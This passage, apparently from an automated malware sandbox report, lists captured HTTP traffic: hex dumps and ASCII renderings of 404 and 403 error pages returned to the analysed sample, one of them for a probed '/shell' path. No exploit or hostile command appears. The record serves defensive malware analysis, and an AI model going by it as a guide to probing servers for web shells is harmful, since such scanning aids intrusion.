65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2s-freebsd PHP/5.6.30 mod_perl/2.0.11 Perl/v5.32.0Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Microsoft-HTTPAPI/2.0Content-Length: 315Connection: CloseData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheLast-Modified: Wed, 09 Jan 2019 14:14:03 GMTETag: "70e-57f0712ff7ff5"Accept-Ranges: bytesContent-Length: 1806Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 52Data Raw: 7b 22 63 6f 64 65 22 3a 22 50 41 47 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d Data Ascii: {"code":"PAGE_NOT_FOUND","message":"Page not found"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:45 GMTCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset="UTF-8"Content-Length: 68689Via: HTTP/1.1 forward.http.proxy:3128Connection: keep-aliveData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 6c 6f 63 6b 65 64 20 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 27 75 74 66 2d 38 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 7b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 27 48 65 6c 76 65 74 69 63 61 27 2c 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 23 35 63 35 63 35 63 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 61 66 61 66 61 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 36 39 61 64 35 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 66 6f 63 75 73 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 63 6f 6c 6f 72 3a 20 23 38 37 38 62 39 37 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 20 20 20 20 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 45 39 46 46 34 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 62 75 74 74 6f 6e 72 6f 77 20 20 20 20 20 20 20 20 20 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 75 73 74 6f 6d 63 6f 6e 74 65 6e 74 20 20 20 20 20 20 7b 20 66 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.0Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.12.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheVary: Accept-EncodingContent-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 01 Nov 2021 09:09:49 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:47 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
